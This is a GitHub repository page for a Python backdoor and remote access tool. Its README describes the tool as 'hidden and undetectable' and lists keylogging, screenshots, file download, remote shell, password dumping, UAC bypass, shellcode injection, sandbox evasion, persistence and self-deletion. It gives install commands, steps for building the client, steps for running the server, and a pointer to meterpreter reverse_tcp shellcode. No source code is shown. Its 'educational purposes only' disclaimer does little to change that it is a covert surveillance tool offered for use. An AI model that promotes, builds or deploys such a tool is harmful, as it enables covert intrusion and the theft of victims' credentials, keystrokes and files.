Skip to content

This program is an non-object oriented opensource, hidden and undetectable backdoor/reverse shell/RAT for Windows made in Python 3 which contains many features such as multi-client support and cross-platform server.

License

Notifications You must be signed in to change notification settings

kipperxp/Python-Backdoor

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Python Backdoor

This project is a cross-platform (Windows/Linux/MacOS) open source, backdoor/reverse tcp/RAT made in Python3 which contains many features such as multi-client support.

image

Installation

You will need:

  • Python
  • One of the following
    • Windows
    • MacOS Big Sur or higher (earlier versions may not work with pyinstaller)
    • Linux (with python3-tkinter)
  1. Download via git git clone https://github.com/xp4xbox/Python-Backdoor --recursive
  2. Install the project requirements by running python -m pip install -r requirements.txt
  3. Install each submodule requirements by running the following:
  • python -m pip install -r src/submodule/LaZagne/requirements.txt
  • python -m pip install -r src/submodule/wesng/requirements.txt (Windows only)

Features

Currently, this program has several features, notably:

  • Multi-client support
  • Cross-platform server and client
  • Fernet encryption
  • Built-in keylogger
  • Send commands to all clients
  • Capture screenshots
  • Upload/download files
  • Download directories recursively
  • Open remote shell or python interpreter
  • Find vulnerability(s) with wesng and linux-exploit-suggester
  • Dump various passwords with LaZagne
  • UAC Bypass with WinPwnage*
  • Disable a process*
  • Inject shellcode*
  • VM/sandboxie check*
  • Add to startup*
  • Ability to melt file*

Asterisk means only supported on Windows

Quick Usage

  1. Open src/setup.py in python and configure options to build the client
  2. Check the dist folder for the binary.
  3. Disable your firewall on the server or configure your firewall to allow the port chosen.
  4. Run the src/main_server.py -p <port> to start the server and accept connections.

If you plan on using the program with DNS hostname or external IP, you must port forward your chosen port.

Command Arguments

  • Arrows <> represent mandatory argument
  • Square brackets [] represents optional argument
  • Brackets (arg) in either above mean arg is the exact argument

eg.

  • I Interact with a connection <index> i 1
  • L List all connections [(inactive)] l or l inactive

Common problems & Solutions

  • Injecting shellcode requires the architecture specified by the command. eg. x64: msfvenom windows/x64/meterpreter/reverse_tcp
  • For use outside of network specified port is not open, check specified port with a port scanner

Disclaimer

This program is for educational purposes only. I take no responsibility or liability for own personal use.

License

License

About

This program is an non-object oriented opensource, hidden and undetectable backdoor/reverse shell/RAT for Windows made in Python 3 which contains many features such as multi-client support and cross-platform server.

Resources

License

Code of conduct

Contributing

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Python 100.0%